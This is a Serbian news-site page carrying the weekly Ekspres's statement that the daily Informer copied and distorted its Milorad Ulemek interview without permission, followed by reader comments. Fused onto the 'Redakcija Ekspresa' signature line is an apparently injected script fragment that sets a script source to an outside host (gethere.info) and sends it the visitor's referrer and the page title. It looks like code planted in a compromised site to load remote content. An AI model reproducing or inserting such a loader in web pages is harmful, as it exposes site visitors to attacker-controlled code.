EKSPRES: “Informer” neovlašćeno preneo intervju Milorada Ulemeka

EKSPRES: “Informer” neovlašćeno preneo intervju Milorada Ulemeka

Original: Intervju kojeg je dnevni list "Informer" neovlašćeno preuzeo i objavio


Objavljivanjem većeg dela intervjua, u danu kada je tekst objavljen u „Ekspresu“, „Informer“ na bahat način prekršio elementarna pravila profesije i zakon o intelektualnoj svojini i autorskim pravima.

Redakcija nedeljnog „Ekspresa“ želi da obavesti javnost da je u današnjem broju (petak 27. maj) dnevni list „Informer“ napravio grubu krađu sadržaja koji je isključivo autorsko pravo našeg lista.

Preuzimanjem na neobjašnjiv način, bez prethodnog odobrenja, i objavljivanjem većeg dela intervjua sa Miloradom Ulemekom, u istom danu kada je tekst objavljen u „Ekspresu“, dnevni list „Informer“ je na bahat način prekršio elementarna pravila profesije i prekršio zakon o intelektualnoj svojini i autorskim pravima.

I ne samo to, „Informer“ u tekstu pod naslovom „Đinđićev ubica pobegao u London“ u pojedinim delovima iznosi i tvrdnje koje odstupaju od onoga što je Ulemek u intervjuu, zaista i rekao. Na taj način u javnost se unosi zabuna, a našem listu čini dodatna šteta. Redakcija „Ekspresa“ prinuđena je iz tih razloga da svoja prava i interese zaštiti na sudu, a u tom smeru su naši advokati već krenuli sa prikupljanjem činjenica i spremanjem tužbe. Takođe, slučaj je prijavljen i Savetu za štampu, od koga očekujemo da se izjasni po hitnom postupku.

Redakcija „Ekspresa“s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

5 komentara

Dodajte komentar
 1. 1
  Julijan A.

  Ah, pa od Vučićevića se moglo tako nešto i očekivati.

  (Mene čudi da nije još pre nešto “mrdnuo” iz Ekspresa. Bolesno je to, bolesno dozlaboga)

 2. 2
  Julijan A.

  Moram opet da pohvalim naslovnicu koja je za čistu desetku, kao i sve prethodne, takođe.
  Neka ostane tako. Samo nemojte menjati format i dizajn, jer ovaj je savršen.

  Naravno, sadržaj lista dobija istu ocenu kao i naslovnice (a bogami i “pozadnice” :)) A, za 39 stranica cena je više nego adekvatna.

 3. 5
  Koja d Inn

  1972 student prodekan je izabran sa dva falsifikovana glasa.
  2000 falsifikator dobija funkciju u ministarstvu za spoljnje poslove.
  2015 falsifikator radi u vezi Evropskih integracija Srbije.
  Pale skupstinu , ruse fantomkama ….PoSTENO/A/-PREVARA..

+ Ostavite komentar